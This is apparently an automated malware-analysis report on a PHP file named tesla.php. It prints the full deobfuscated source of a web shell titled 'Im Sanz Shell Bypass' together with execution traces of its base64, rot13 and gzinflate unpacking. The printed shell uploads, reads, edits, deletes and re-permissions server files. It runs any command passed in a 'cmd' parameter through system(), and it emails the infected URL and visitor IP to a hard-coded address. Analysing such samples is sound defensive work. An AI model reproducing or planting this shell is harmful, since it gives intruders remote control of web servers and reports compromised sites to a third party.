PHP Malware Analysis
tesla.php
md5: 74b511cff578ed6d3d93052d736e10c0
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Emails
- fatonahnasiah@gmail.com (Deobfuscated, Traces)
- sngbanuanfvnu@tznvy.pbz (Traces)
Encoding
Environment
- error_reporting (Deobfuscated, Traces)
- getcwd (Deobfuscated, Traces)
- php_uname (Deobfuscated, Traces)
- set_time_limit (Deobfuscated, Traces)
Execution
- eval (Original, Traces)
- system (Deobfuscated, Traces)
Files
- copy (Deobfuscated, Traces)
- file_get_contents (Deobfuscated, Traces)
Input
- _FILES (Deobfuscated, Traces)
- _GET (Deobfuscated, Traces)
- _POST (Deobfuscated, Traces)
URLs
- http://localhost/uploads/tesla.php (Traces)
- https://fonts.googleapis.com/css?family=Kelly+Slab (Deobfuscated, HTML, Traces)
- https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css (Deobfuscated, HTML, Traces)
Deobfuscated PHP code
<?php
eval /* PHPDeobfuscator eval output */ {
error_reporting(0);
session_start();
if (get_magic_quotes_gpc()) {
foreach ($_POST as $key => $value) {
$_POST[$key] = stripslashes($value);
}
}
echo "<!DOCTYPE HTML>\r\n<link href=\"https://fonts.googleapis.com/css?family=Kelly+Slab\" rel=\"stylesheet\" type=\"text/css\">\r\n<link href=\"https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css\" rel=\"stylesheet\" type=\"text/css\"/>\r\n<center>\r\n<style type=\"text/css\">\r\nbody {\r\n\tfont-family: Kelly Slab;\r\n\tbackground-color: black;\r\n\tcolor: lime;\r\n\t}\r\n#content tr:hover{\r\n\tbackground-color: grey;\r\n\ttext-shadow:0px 0px 10px #000000;\r\n\t}\r\n#content .first{\r\n\tcolor: #000000;\r\n\tbackground-image:url(#);\r\n\t}\r\n#content .first:hover{\r\n\tbackground-color: grey;\r\n\ttext-shadow:0px 0px 1px #339900;\r\n\t}\r\ntable, th, td {\r\n\t\tborder-collapse:collapse;\r\n\t\tpadding: 5px;\r\n\t\tcolor: lime;\r\n\t\t}\r\n.table_home, .th_home, .td_home { \r\n\t\tcolor: lime;\r\n\t\tborder: 2px solid grey;\r\n\t\tpadding: 7px;\r\n\t\t}\r\na{\r\n\tfont-size: 19px;\r\n\tcolor: #00ff00;\r\n\ttext-decoration: none;\r\n\t}\r\na:hover{\r\n\tcolor: white;\r\n\ttext-shadow:0px 0px 10px #339900;\r\n\t}\r\ninput,select,textarea{\r\n\tborder: 1px #ffffff solid;\r\n\t-moz-border-radius: 5px;\r\n\t-webkit-border-radius:5px;\r\n\tborder-radius:5px;\r\n\t}\r\n.close {\r\n\toverflow: auto;\r\n\tborder: 1px solid lime;\r\n\tbackground: lime;\r\n\tcolor: white;\r\n\t}\r\n.r {\r\n\tfloat: right;\r\n\ttext-align: right;\r\n\t}\r\n</style>\r\n<a href=\"?\"><h1 style=\"font-family: Kelly Slab; font-size: 35px; color: white;\">\r\nIm Sanz Shell Bypass </h1></a>\r\n<BODY>\r\n\r\n<table width=\"95%\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" align=\"left\">\r\n<tr><td>";
echo "<tr><td><font color='white'>\r\n<i class='fa fa-user'></i> <td>: <font color='lime'>" . $_SERVER['REMOTE_ADDR'] . "<tr><td><font color='white'>\r\n<i class='fa fa-desktop'></i> <td>: <font color='lime'>" . gethostbyname($_SERVER['HTTP_HOST']) . " / " . $_SERVER['SERVER_NAME'] . "<tr><td><font color='white'>\r\n<i class='fa fa-hdd-o'></i> <td>: <font color='lime'>" . php_uname() . "</font></tr></td></table>";
echo "<table width=\"95%\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" align=\"center\">\r\n<tr align=\"center\"><td align=\"center\"><br>";
if (isset($_GET['path'])) {
$path = $_GET['path'];
} else {
$path = getcwd();
}
$path = str_replace('\\', '/', $path);
$paths = explode('/', $path);
foreach ($paths as $id => $pat) {
if ($pat == '' && $id == 0) {
$a = true;
echo "<i class=\"fa fa-folder-o\"></i> : <a href=\"?path=/\">/</a>";
continue;
}
if ($pat == '') {
continue;
}
echo "<a href=\"?path=";
for ($i = 0; $i <= $id; $i++) {
echo "{$paths[$i]}";
if ($i != $id) {
echo "/";
}
}
echo '">' . $pat . '</a>/';
}
echo "<br><br><br><font color=\"lime\"><form enctype=\"multipart/form-data\" method=\"POST\">\r\nUpload File: <input type=\"file\" name=\"file\" style=\"color:lime;border:2px solid lime;\" required/></font>\r\n<input type=\"submit\" value=\"UPLOAD\" style=\"margin-top:4px;width:100px;height:27px;font-family:Kelly Slab;font-size:15;background:black;color: lime;border:2px solid lime;border-radius:5px\"/>";
if (isset($_FILES['file'])) {
if (copy($_FILES['file']['tmp_name'], $path . '/' . $_FILES['file']['name'])) {
echo "<br><br><font color=\"lime\">UPLOAD SUCCES !!!!</font><br/>";
} else {
echo "<script>alert(\"File Gagal Diupload !!\")</script>";
}
}
echo "</form></td></tr>";
if (isset($_GET['filesrc'])) {
echo "<tr><td>files >> ";
echo $_GET['filesrc'];
echo "</tr></td></table><br />";
echo ' <textarea style="font-size: 8px; border: 1px solid white; background-color: black; color: white; width: 100%;height: 1200px;" readonly> ' . htmlspecialchars(file_get_contents($_GET['filesrc'])) . '</textarea>';
} elseif (isset($_GET['option']) && $_POST['opt'] != 'delete') {
echo '</table><br /><center>' . $_POST['path'] . '<br /><br />';
//Chmod
if ($_POST['opt'] == 'chmod') {
if (isset($_POST['perm'])) {
if (chmod($_POST['path'], $_POST['perm'])) {
echo "<br><br><font color=\"lime\">CHANGE PERMISSION SUCCESS !!</font><br/>";
} else {
echo "<script>alert(\"Change Permission Gagal !!\")</script>";
}
}
echo '<form method="POST">
Permission : <input name="perm" type="text" size="4" value="' . substr(sprintf('%o', fileperms($_POST['path'])), -4) . '" style="width:80px; height: 30px;"/>
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="chmod">
<input type="submit" value="Lanjut" style="width:60px; height: 30px;"/>
</form>';
} elseif ($_GET['opt'] == 'btw') {
$cwd = getcwd();
echo '<form action="?option&path=' . $cwd . '&opt=delete&type=buat" method="POST">
New Name : <input name="name" type="text" size="25" value="Folder" style="width:300px; height: 30px;"/>
<input type="hidden" name="path" value="' . $cwd . '">
<input type="hidden" name="opt" value="delete">
<input type="submit" value="Go" style="width:100px; height: 30px;"/>
</form>';
} elseif ($_POST['opt'] == 'rename') {
if (isset($_POST['newname'])) {
if (rename($_POST['path'], $path . '/' . $_POST['newname'])) {
echo "<br><br><font color=\"lime\">CHANGE NAME SUCCESS !!</font><br/>";
} else {
echo "<script>alert(\"Change Name Gagal !!\")</script>";
}
$_POST['name'] = $_POST['newname'];
}
echo '<form method="POST">
New Name : <input name="newname" type="text" size="5" style="width:20%; height:30px;" value="' . $_POST['name'] . '" />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="rename">
<input type="submit" value="Lanjut" style="height:30px;" />
</form>';
} elseif ($_POST['opt'] == 'edit') {
if (isset($_POST['src'])) {
$fp = fopen($_POST['path'], 'w');
if (fwrite($fp, $_POST['src'])) {
echo "<br><br><font color=\"lime\">EDIT FILE SUCCESS !!</font><br/>";
} else {
echo "<script>alert(\"Edit File Gagal !!\")</script>";
}
fclose($fp);
}
echo '<form method="POST">
<textarea cols=80 rows=20 name="src" style="font-size: 8px; border: 1px solid white; background-color: black; color: white; width: 100%;height: 1000px;">' . htmlspecialchars(file_get_contents($_POST['path'])) . '</textarea><br />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="edit">
<input type="submit" value="Lanjut" style="height:30px; width:70px;"/>
</form>';
}
echo "</center>";
} else {
echo "</table><br /><center>";
//delete dir
if (isset($_GET['option']) && $_POST['opt'] == 'delete') {
if ($_POST['type'] == 'dir') {
if (rmdir($_POST['path'])) {
echo "<br><br><font color=\"lime\">DELETE DIR SUCCESS !!</font><br/>";
} else {
echo "<script>alert(\"Delete Dir Gagal !!\")</script>>";
}
} elseif ($_POST['type'] == 'file') {
if (unlink($_POST['path'])) {
echo "<br><br><font color=\"lime\">DELETE FILE SUCCESS !!</font><br/>";
} else {
echo "<script>alert(\"Delete File Gagal !!\")</script>";
}
}
}
echo "</center>";
$scandir = scandir($path);
$pa = getcwd();
echo "<div id=\"content\"><table width=\"95%\" class=\"table_home\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">\r\n<tr class=\"first\">\r\n<th><center>Name</center></th>\r\n<th><center>Size</center></th>\r\n<th><center>Perm</center></th>\r\n<th><center>Options</center></th>\r\n</tr>\r\n<tr>";
foreach ($scandir as $dir) {
if (!is_dir("{$path}/{$dir}") || $dir == '.' || $dir == '..') {
continue;
}
echo "<tr>\r\n<td class=td_home><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='><a href=\"?path={$path}/{$dir}\"> {$dir}</a></td>\r\n<td class=td_home><center>DIR</center></td>\r\n<td class=td_home><center>";
if (is_writable("{$path}/{$dir}")) {
echo "<font color=\"#57FF00\">";
} elseif (!is_readable("{$path}/{$dir}")) {
echo "<font color=\"#FF0004\">";
}
echo perms("{$path}/{$dir}");
if (is_writable("{$path}/{$dir}") || !is_readable("{$path}/{$dir}")) {
echo "</font>";
}
echo "</center></td>\r\n<td class=td_home><center><form method=\"POST\" action=\"?option&path={$path}\">\r\n<select name=\"opt\" style=\"margin-top:6px;width:100px;font-family:Kelly Slab;font-size:15;background:black;color:lime;border:2px solid lime;border-radius:5px\">\r\n<option value=\"Action\">Action</option>\r\n<option value=\"delete\">Delete</option>\r\n<option value=\"chmod\">Chmod</option>\r\n<option value=\"rename\">Rename</option>\r\n</select>\r\n<input type=\"hidden\" name=\"type\" value=\"dir\">\r\n<input type=\"hidden\" name=\"name\" value=\"{$dir}\">\r\n<input type=\"hidden\" name=\"path\" value=\"{$path}/{$dir}\">\r\n<input type=\"submit\" value=\">\" style=\"margin-top:6px;width:27;font-family:Kelly Slab;font-size:15;background:black;color:lime;border:2px solid lime;border-radius:5px\"/>\r\n</form></center></td>\r\n</tr>";
}
echo "<tr class=\"first\"><td></td><td></td><td></td><td></td></tr>";
foreach ($scandir as $file) {
if (!is_file("{$path}/{$file}")) {
continue;
}
$size = filesize("{$path}/{$file}") / 1024;
$size = round($size, 3);
if ($size >= 1024) {
$size = round($size / 1024, 2) . ' MB';
} else {
$size .= ' KB';
}
echo "<tr>\r\n<td class=td_home><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href=\"?filesrc={$path}/{$file}&path={$path}\"> {$file}</a></td>\r\n<td class=td_home><center>" . $size . "</center></td>\r\n<td class=td_home><center>";
if (is_writable("{$path}/{$file}")) {
echo "<font color=\"#57FF00\">";
} elseif (!is_readable("{$path}/{$file}")) {
echo "<font color=\"#FF0004\">";
}
echo perms("{$path}/{$file}");
if (is_writable("{$path}/{$file}") || !is_readable("{$path}/{$file}")) {
echo "</font>";
}
echo "</center></td>\r\n<td class=td_home><center><form method=\"POST\" action=\"?option&path={$path}\">\r\n<select name=\"opt\" style=\"margin-top:6px;width:100px;font-family:Kelly Slab;font-size:15;background:black;color:lime;border:2px solid lime;border-radius:5px\">\r\n<option value=\"Action\">Action</option>\r\n<option value=\"delete\">Delete</option>\r\n<option value=\"edit\">Edit</option>\r\n<option value=\"rename\">Rename</option>\r\n<option value=\"chmod\">Chmod</option>\r\n</select>\r\n<input type=\"hidden\" name=\"type\" value=\"file\">\r\n<input type=\"hidden\" name=\"name\" value=\"{$file}\">\r\n<input type=\"hidden\" name=\"path\" value=\"{$path}/{$file}\">\r\n<input type=\"submit\" value=\">\" style=\"margin-top:6px;width:27;font-family:Kelly Slab;font-size:15;background:black;color:lime;border:2px solid lime;border-radius:5px\"/>\r\n</form></center></td>\r\n</tr>";
}
echo "</table>\r\n</div>";
}
function perms($file)
{
$perms = fileperms($file);
if (($perms & 0xc000) == 0xc000) {
// Socket
$info = 's';
} elseif (($perms & 0xa000) == 0xa000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}
// Owner
$info .= $perms & 0x100 ? 'r' : '-';
$info .= $perms & 0x80 ? 'w' : '-';
$info .= $perms & 0x40 ? $perms & 0x800 ? 's' : 'x' : ($perms & 0x800 ? 'S' : '-');
// Group
$info .= $perms & 0x20 ? 'r' : '-';
$info .= $perms & 0x10 ? 'w' : '-';
$info .= $perms & 0x8 ? $perms & 0x400 ? 's' : 'x' : ($perms & 0x400 ? 'S' : '-');
// World
$info .= $perms & 0x4 ? 'r' : '-';
$info .= $perms & 0x2 ? 'w' : '-';
$info .= $perms & 0x1 ? $perms & 0x200 ? 't' : 'x' : ($perms & 0x200 ? 'T' : '-');
return $info;
}
};
eval /* PHPDeobfuscator eval output */ {
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
set_time_limit(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
$tujuanmail = 'fatonahnasiah@gmail.com';
$x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
$pesan_alert = "fix {$x_path} :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";
mail($tujuanmail, "LOGGER", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");
};
eval /* PHPDeobfuscator eval output */ {
if (isset($_REQUEST["cmd"])) {
echo "<pre>";
$cmd = $_REQUEST["cmd"];
system($cmd);
echo "</pre>";
die;
}
};Execution traces
data/traces/74b511cff578ed6d3d93052d736e10c0_trace-1676258737.153.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:26:03.050821]
1 0 1 0.000141 393512
1 3 0 0.000212 405184 {main} 1 /var/www/html/uploads/tesla.php 0 0
2 4 0 0.000229 405184 base64_decode 0 /var/www/html/uploads/tesla.php 2 1 '7Tp2YtrK2p9bqf9ujkJBDSLBcw8kQwGBkM2ATAI0SHEb20CIscfYiTn3/vc7iwGzJXZ7aK706o2aYM888+zbPBSqqqw+qkORSN2V5iE+fAa+fNagprmy9KjphqqHwnRfPn/57NqhOdQfF8bcNR+HI0yH2uNcMVDh8N9fPtuyCg3TCR09lljVWGB14OgVQfOFo7HhjSCGoDvf8fIPkAearrqK5hmaA7WQD4XI/Jv8+/IZmo4M2PM/mqXG5XpMBJ3LTr/w5fO551evwEShnXQcXUq0HMfZsqR40bkszz11KK4WNeUFdHfaN9tLuN4034OeN41HPXDGABVtbFPTpx5RZ6HOAH2qwDyjwycdH24OkEB3MF8VUGqiM0zWEeuGb00SIYSpnxgTqMkLyCWjmSiPEXosVBcuglLY3yXPbvomlGeo4icCuYfFmXlaAUXpJ0+FipkDUUGA5VFt/DRQHM9IbCRMJ6bsyXcOzDy0hLf8as9dQPyK9P2niRAhskBKZo48'
2 4 1 0.000276 413408
2 4 R '�:vb��ڟ[��n�BA\r"�s\017$C\001��̀L\0024Hq\033�@���؉9���;�\001�%v{h��ꍚ`�<���<\024���>�C�Hݕ�!>|\006�|֠����醪��t_>��ڡ9�\037\027��5\037�#L���\\1P���_>۲\n\r�\t\035=�X�X`u��\025A� ��;���\017�\a�����\031�\003��\017������\031��\f��?����zL\004��N�����W��D��t\034]J�\034�ٲ�xѹ,�=u(�\0265�\005tw�7�K��4߃�7�G=p�\000\025mlSӧ\036Qg��\000}��<��\'\035\037n\016�@w0_\025Pj�3L�\021�oM\022!���\030\023��\v�%��(�\021z,T\027.�R��%�n�&�g��\'\002��řyZ\001E�\'O���\003QA��Qm�4P\034�Hl$L\'���w\016�<����j�]@���\'
2 5 0 0.000395 413376 str_rot13 0 /var/www/html/uploads/tesla.php 2 1 '�:vb��ڟ[��n�BA\r"�s\017$C\001��̀L\0024Hq\033�@���؉9���;�\001�%v{h��ꍚ`�<���<\024���>�C�Hݕ�!>|\006�|֠����醪��t_>��ڡ9�\037\027��5\037�#L���\\1P���_>۲\n\r�\t\035=�X�X`u��\025A� ��;���\017�\a�����\031�\003��\017������\031��\f��?����zL\004��N�����W��D��t\034]J�\034�ٲ�xѹ,�=u(�\0265�\005tw�7�K��4߃�7�G=p�\000\025mlSӧ\036Qg��\000}��<��\'\035\037n\016�@w0_\025Pj�3L�\021�oM\022!���\030\023��\v�%��(�\021z,T\027.�R��%�n�&�g��\'\002��řyZ\001E�\'O���\003QA��Qm�4P\034�Hl$L\'���w\016�<����j�]@���\'
2 5 1 0.000509 421600
2 5 R '�:io��ڟ[��a�ON\r"�f\017$P\001��̀Y\0024Ud\033�@���؉9���;�\001�%i{u��ꍚ`�<���<\024���>�P�Uݕ�!>|\006�|֠����醪��g_>��ڡ9�\037\027��5\037�#Y���\\1C���_>۲\n\r�\t\035=�K�K`h��\025N� ��;���\017�\a�����\031�\003��\017������\031��\f��?����mY\004��A�����J��Q��g\034]W�\034�ٲ�kѹ,�=h(�\0265�\005gj�7�X��4߃�7�T=c�\000\025zyFӧ\036Dt��\000}��<��\'\035\037a\016�@j0_\025Cw�3Y�\021�bZ\022!���\030\023��\v�%��(�\021m,G\027.�E��%�a�&�t��\'\002��řlM\001R�\'B���\003DN��Dz�4C\034�Uy$Y\'���j\016�<����w�]@���\'
2 6 0 0.000624 413376 gzinflate 0 /var/www/html/uploads/tesla.php 2 1 '�:io��ڟ[��a�ON\r"�f\017$P\001��̀Y\0024Ud\033�@���؉9���;�\001�%i{u��ꍚ`�<���<\024���>�P�Uݕ�!>|\006�|֠����醪��g_>��ڡ9�\037\027��5\037�#Y���\\1C���_>۲\n\r�\t\035=�K�K`h��\025N� ��;���\017�\a�����\031�\003��\017������\031��\f��?����mY\004��A�����J��Q��g\034]W�\034�ٲ�kѹ,�=h(�\0265�\005gj�7�X��4߃�7�T=c�\000\025zyFӧ\036Dt��\000}��<��\'\035\037a\016�@j0_\025Cw�3Y�\021�bZ\022!���\030\023��\v�%��(�\021m,G\027.�E��%�a�&�t��\'\002��řlM\001R�\'B���\003DN��Dz�4C\034�Uy$Y\'���j\016�<����w�]@���\'
2 6 1 0.000783 429792
2 6 R 'reebe_ercbegvat(0); \r\nfrffvba_fgneg();\r\n\r\nvs(trg_zntvp_dhbgrf_tcp()){\r\nsbernpu($_CBFG nf $xrl=>$inyhr){\r\n$_CBFG[$xrl] = fgevcfynfurf($inyhr);\r\n}\r\n}\r\n\r\nrpub \'<!QBPGLCR UGZY>\r\n<yvax uers="uggcf://sbagf.tbbtyrncvf.pbz/pff?snzvyl=Xryyl+Fyno" ery="fglyrfurrg" glcr="grkg/pff">\r\n<yvax uers="uggcf://fgnpxcngu.obbgfgencpqa.pbz/sbag-njrfbzr/4.7.0/pff/sbag-njrfbzr.zva.pff" ery="fglyrfurrg" glcr="grkg/pff"/>\r\n<pragre>\r\n<fglyr glcr="grkg/pff">\r\nobql {\r\n\tsbag-snzvyl: Xryyl Fyno;\r\n\tonpxt'
2 7 0 0.000836 421568 str_rot13 0 /var/www/html/uploads/tesla.php 2 1 'reebe_ercbegvat(0); \r\nfrffvba_fgneg();\r\n\r\nvs(trg_zntvp_dhbgrf_tcp()){\r\nsbernpu($_CBFG nf $xrl=>$inyhr){\r\n$_CBFG[$xrl] = fgevcfynfurf($inyhr);\r\n}\r\n}\r\n\r\nrpub \'<!QBPGLCR UGZY>\r\n<yvax uers="uggcf://sbagf.tbbtyrncvf.pbz/pff?snzvyl=Xryyl+Fyno" ery="fglyrfurrg" glcr="grkg/pff">\r\n<yvax uers="uggcf://fgnpxcngu.obbgfgencpqa.pbz/sbag-njrfbzr/4.7.0/pff/sbag-njrfbzr.zva.pff" ery="fglyrfurrg" glcr="grkg/pff"/>\r\n<pragre>\r\n<fglyr glcr="grkg/pff">\r\nobql {\r\n\tsbag-snzvyl: Xryyl Fyno;\r\n\tonpxt'
2 7 1 0.000890 437984
2 7 R 'error_reporting(0); \r\nsession_start();\r\n\r\nif(get_magic_quotes_gpc()){\r\nforeach($_POST as $key=>$value){\r\n$_POST[$key] = stripslashes($value);\r\n}\r\n}\r\n\r\necho \'<!DOCTYPE HTML>\r\n<link href="https://fonts.googleapis.com/css?family=Kelly+Slab" rel="stylesheet" type="text/css">\r\n<link href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" type="text/css"/>\r\n<center>\r\n<style type="text/css">\r\nbody {\r\n\tfont-family: Kelly Slab;\r\n\tbackg'
2 8 0 0.001332 479400 eval 1 'error_reporting(0); \r\nsession_start();\r\n\r\nif(get_magic_quotes_gpc()){\r\nforeach($_POST as $key=>$value){\r\n$_POST[$key] = stripslashes($value);\r\n}\r\n}\r\n\r\necho \'<!DOCTYPE HTML>\r\n<link href="https://fonts.googleapis.com/css?family=Kelly+Slab" rel="stylesheet" type="text/css">\r\n<link href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" type="text/css"/>\r\n<center>\r\n<style type="text/css">\r\nbody {\r\n\tfont-family: Kelly Slab;\r\n\tbackground-color: black;\r\n\tcolor: lime;\r\n\t}\r\n#content tr:hover{\r\n\tbackground-color: grey;\r\n\ttext-shadow:0px 0px 10px #000000;\r\n\t}\r\n#content .first{\r\n\tcolor: #000000;\r\n\tbackground-image:url(#);\r\n\t}\r\n#content .first:hover{\r\n\tbackground-color: grey;\r\n\ttext-shadow:0px 0px 1px #339900;\r\n\t}\r\ntable, th, td {\r\n\t\tborder-collapse:collapse;\r\n\t\tpadding: 5px;\r\n\t\tcolor: lime;\r\n\t\t}\r\n.table_home, .th_home, .td_home { \r\n\t\tcolor: lime;\r\n\t\tborder: 2px solid grey;\r\n\t\tpadding: 7px;\r\n\t\t}\r\na{\r\n\tfont-size: 19px;\r\n\tcolor: #00ff00;\r\n\ttext-decoration: none;\r\n\t}\r\na:hover{\r\n\tcolor: white;\r\n\ttext-shadow:0px 0px 10px #339900;\r\n\t}\r\ninput,select,textarea{\r\n\tborder: 1px #ffffff solid;\r\n\t-moz-border-radius: 5px;\r\n\t-webkit-border-radius:5px;\r\n\tborder-radius:5px;\r\n\t}\r\n.close {\r\n\toverflow: auto;\r\n\tborder: 1px solid lime;\r\n\tbackground: lime;\r\n\tcolor: white;\r\n\t}\r\n.r {\r\n\tfloat: right;\r\n\ttext-align: right;\r\n\t}\r\n</style>\r\n<a href="?"><h1 style="font-family: Kelly Slab; font-size: 35px; color: white;">\r\nIm Sanz Shell Bypass </h1></a>\r\n<BODY>\r\n\r\n<table width="95%" border="0" cellpadding="0" cellspacing="0" align="left">\r\n<tr><td>\';\r\necho "<tr><td><font color=\'white\'>\r\n<i class=\'fa fa-user\'></i> <td>: <font color=\'lime\'>".$_SERVER[\'REMOTE_ADDR\']."<tr><td><font color=\'white\'>\r\n<i class=\'fa fa-desktop\'></i> <td>: <font color=\'lime\'>".gethostbyname($_SERVER[\'HTTP_HOST\'])." / ".$_SERVER[\'SERVER_NAME\']."<tr><td><font color=\'white\'>\r\n<i class=\'fa fa-hdd-o\'></i> <td>: <font color=\'lime\'>".php_uname()."</font></tr></td></table>";\r\n\r\necho \'<table width="95%" border="0" cellpadding="0" cellspacing="0" align="center">\r\n<tr align="center"><td align="center"><br>\';\r\n\r\nif(isset($_GET[\'path\'])){\r\n$path = $_GET[\'path\'];\r\n}else{\r\n$path = getcwd();\r\n}\r\n$path = str_replace(\'\\\\\',\'/\',$path);\r\n$paths = explode(\'/\',$path);\r\n\r\nforeach($paths as $id=>$pat){\r\nif($pat == \'\' && $id == 0){\r\n$a = true;\r\necho \'<i class="fa fa-folder-o"></i> : <a href="?path=/">/</a>\';\r\ncontinue;\r\n}\r\nif($pat == \'\') continue;\r\necho \'<a href="?path=\';\r\nfor($i=0;$i<=$id;$i++){\r\necho "$paths[$i]";\r\nif($i != $id) echo "/";\r\n}\r\necho \'">\'.$pat.\'</a>/\';\r\n}\r\n\r\n\r\n//upload\r\necho \'<br><br><br><font color="lime"><form enctype="multipart/form-data" method="POST">\r\nUpload File: <input type="file" name="file" style="color:lime;border:2px solid lime;" required/></font>\r\n<input type="submit" value="UPLOAD" style="margin-top:4px;width:100px;height:27px;font-family:Kelly Slab;font-size:15;background:black;color: lime;border:2px solid lime;border-radius:5px"/>\';\r\nif(isset($_FILES[\'file\'])){\r\nif(copy($_FILES[\'file\'][\'tmp_name\'],$path.\'/\'.$_FILES[\'file\'][\'name\'])){\r\necho \'<br><br><font color="lime">UPLOAD SUCCES !!!!</font><br/>\';\r\n}else{\r\necho \'<script>alert("File Gagal Diupload !!")</script>\';\r\n}\r\n}\r\n\r\necho \'</form></td></tr>\';\r\nif(isset($_GET[\'filesrc\'])){\r\necho "<tr><td>files >> ";\r\necho $_GET[\'filesrc\'];\r\necho \'</tr></td></table><br />\';\r\necho(\' <textarea style="font-size: 8px; border: 1px solid white; background-color: black; color: white; width: 100%;height: 1200px;" readonly> \'.htmlspecialchars(file_get_contents($_GET[\'filesrc\'])).\'</textarea>\');\r\n}elseif(isset($_GET[\'option\']) && $_POST[\'opt\'] != \'delete\'){\r\necho \'</table><br /><center>\'.$_POST[\'path\'].\'<br /><br />\';\r\n\r\n//Chmod\r\nif($_POST[\'opt\'] == \'chmod\'){\r\nif(isset($_POST[\'perm\'])){\r\nif(chmod($_POST[\'path\'],$_POST[\'perm\'])){\r\necho \'<br><br><font color="lime">CHANGE PERMISSION SUCCESS !!</font><br/>\';\r\n}else{\r\necho \'<script>alert("Change Permission Gagal !!")</script>\';\r\n}\r\n}\r\necho \'<form method="POST">\r\nPermission : <input name="perm" type="text" size="4" value="\'.substr(sprintf(\'%o\', fileperms($_POST[\'path\'])), -4).\'" style="width:80px; height: 30px;"/>\r\n<input type="hidden" name="path" value="\'.$_POST[\'path\'].\'">\r\n<input type="hidden" name="opt" value="chmod">\r\n<input type="submit" value="Lanjut" style="width:60px; height: 30px;"/>\r\n</form>\';\r\n}\r\n\r\n//rename folder\r\nelseif($_GET[\'opt\'] == \'btw\'){\r\n\t$cwd = getcwd();\r\n\t echo \'<form action="?option&path=\'.$cwd.\'&opt=delete&type=buat" method="POST">\r\nNew Name : <input name="name" type="text" size="25" value="Folder" style="width:300px; height: 30px;"/>\r\n<input type="hidden" name="path" value="\'.$cwd.\'">\r\n<input type="hidden" name="opt" value="delete">\r\n<input type="submit" value="Go" style="width:100px; height: 30px;"/>\r\n</form>\';\r\n}\r\n\r\n//rename file\r\nelseif($_POST[\'opt\'] == \'rename\'){\r\nif(isset($_POST[\'newname\'])){\r\nif(rename($_POST[\'path\'],$path.\'/\'.$_POST[\'newname\'])){\r\necho \'<br><br><font color="lime">CHANGE NAME SUCCESS !!</font><br/>\';\r\n}else{\r\necho \'<script>alert("Change Name Gagal !!")</script>\';\r\n}\r\n$_POST[\'name\'] = $_POST[\'newname\'];\r\n}\r\necho \'<form method="POST">\r\nNew Name : <input name="newname" type="text" size="5" style="width:20%; height:30px;" value="\'.$_POST[\'name\'].\'" />\r\n<input type="hidden" name="path" value="\'.$_POST[\'path\'].\'">\r\n<input type="hidden" name="opt" value="rename">\r\n<input type="submit" value="Lanjut" style="height:30px;" />\r\n</form>\';\r\n}\r\n\r\n//edit file\r\nelseif($_POST[\'opt\'] == 